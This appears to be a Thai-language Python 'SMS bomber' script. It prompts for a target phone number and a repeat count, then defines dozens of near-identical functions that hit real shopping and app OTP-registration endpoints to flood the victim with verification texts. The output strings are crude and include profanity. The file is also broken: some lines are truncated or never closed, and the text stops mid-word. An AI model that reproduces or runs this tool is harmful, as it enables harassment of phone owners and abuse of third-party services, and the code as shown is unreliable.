import requests
import os
import time
import threading
from threading import Thread
os.system("clear")
time.sleep (1)
print ("\t\x1b[91mกำลังโหลดครับรอแปป.....")
time.sleep (5)
os.system ("clear")
time.sleep (1)
print ("\x1b[91mไปกดติดตาม!!!")
time.sleep (1)
print ("\x1b[96m[\x1b[91m1\x1b[96m] \x1b[96mกดติดตามก่อนใช่ \x1b[91m:V")
time.sleep (1)
os.system("xdg-ope
time.sleep (8)
print ("\x1b[96m[\x1b[91m2\x1b[96m] \x1b[96mกดติดตามผมด้วยครับ\x1b[91m:)")
time.sleep (1)
print ("\x1b[91m")
os.system ("clear")
time.sleep (1)
print("\033[92mํ_______________________ขายพ่อมึงตาย____________")
print("")
print("\033[92mhttps://www.facebook.com/autozammza")
print("")
print("")
print("\033[92mYouTube:Z-NightShot")
print("list")
print("")
phone = input("\033[95m[+] Number : \033[0m")
num = int(input("\033[95m[+] How : \033[0m"))
os.system("clear")
print("\033[95m______________ของฟรี ______________")

def test(): 
	requests.post("https://api.true-shopping.com/customer/api/request-activate/mobile_no", data={"username": phone})
	print("\033[92m ยิงอยู่ไอสัส
	
def test2():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")
	
def test3():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")
	
def test4():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")
def test5():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")
	
def test6():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")
	
def test7():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่่ไอสัส")
	
def test8():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test9():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ครับ")
	
def test10():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test11():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test12():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")
	
def test119():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")
	
def test14():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test15():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test16():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")

def test17():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยูไอสัส")

def test19():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m รักนะ")
	
def test22():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")
	
def test23():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")

def test21():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")

def test18():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส")
	
def test24():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m  ยิงอยู่ไอสัส")

def test25():
	requests.get(f"https://asv-mobileapp-prod.azurewebsites.net/api/Signin/SendOTP?phoneNo={phone}&type=Register")
	print("\033[92m ยิงอยู่ไอสัส ")
	
def test27():
	requ
